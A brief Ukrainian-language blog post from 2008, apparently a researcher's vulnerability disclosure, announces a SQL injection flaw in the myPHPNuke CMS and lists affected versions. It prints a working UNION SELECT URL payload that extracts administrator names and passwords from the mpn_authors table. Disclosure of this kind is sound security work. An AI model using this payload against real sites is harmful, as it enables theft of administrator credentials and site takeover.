Нова SQL Injection уразливість в myPHPNuke

23:58 29.08.2008

Сьогодні, 29.08.2008, після знайдення попередніх уразливостей в myPHPNuke, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/article.php?sid=-1%20union%20select%20null,null,null,null,aid,pwd,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії системи наявні додаткові фільтри). При цьому остання версія також уразлива - при відключених magic quotes в ній можлива обмежена SQL Injection атака.


Leave a Reply

You must be logged in to post a comment.